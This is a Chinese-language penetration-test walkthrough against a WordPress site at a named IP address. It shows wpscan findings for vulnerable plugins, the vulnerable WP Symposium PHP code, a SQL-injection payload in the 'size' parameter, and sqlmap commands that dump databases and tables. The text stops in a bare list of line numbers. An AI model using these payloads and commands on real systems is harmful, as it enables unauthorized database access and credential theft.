Wordpress插件渗透测试

0x00 信息收集

网址是一个wordpress博客。

Apache/2.4.10 (Debian)

既然是wp，直接用wpscan扫一扫。

[+] We found 2 plugins:

[+] Name: akismet
 |  Latest version: 3.3.4
 |  Location: http://218.2.197.234:2040/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
 |  Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
 |  Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1

找到了两个“过气”插件，存在漏洞。

[!] Title: WP Symposium <= 15.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7902
    Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
    Reference: http://packetstormsecurity.com/files/131801/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
    Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4

[!] Title: WP Symposium <=  15.5.1 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8140
    Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
    Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8148
    Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8

0x01 漏洞利用

CVE-2015-3325的sql注入是利用wp-symposium插件中的get_album_item.php。

    include_once('../../../wp-config.php');
    global $wpdb;
    $iid = $_REQUEST['iid'];
    $size = $_REQUEST['size'];
    $sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
    $image = $wpdb->get_var($wpdb->prepare($sql, $iid));    
    header("Content-type: image/jpeg");
    echo stripslashes($image);
?>

构造size参数，来进行sql查询，代码也没有过滤，但是在查询列名限制table_name的时候却没有返回，如果不限制table_name，会因为文件大小限制只显示1kb的内容，看不到wp_users的列名。

?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--

无奈，放弃这个漏洞，看那个盲注的CVE。

https://www.exploit-db.com/exploits/37822/

topic_id参数存在盲注，访问对应页面，将post请求保存到文件中，用sqlmap来测试。(测试的时候没有删掉exp中的sleep函数，导致脚本多跑了好久。。。)

sqlmap -r "E:1.txt" --dbs --level 3

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress

表名

sqlmap -r "E:1.txt" -D "wordpress" --tables

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28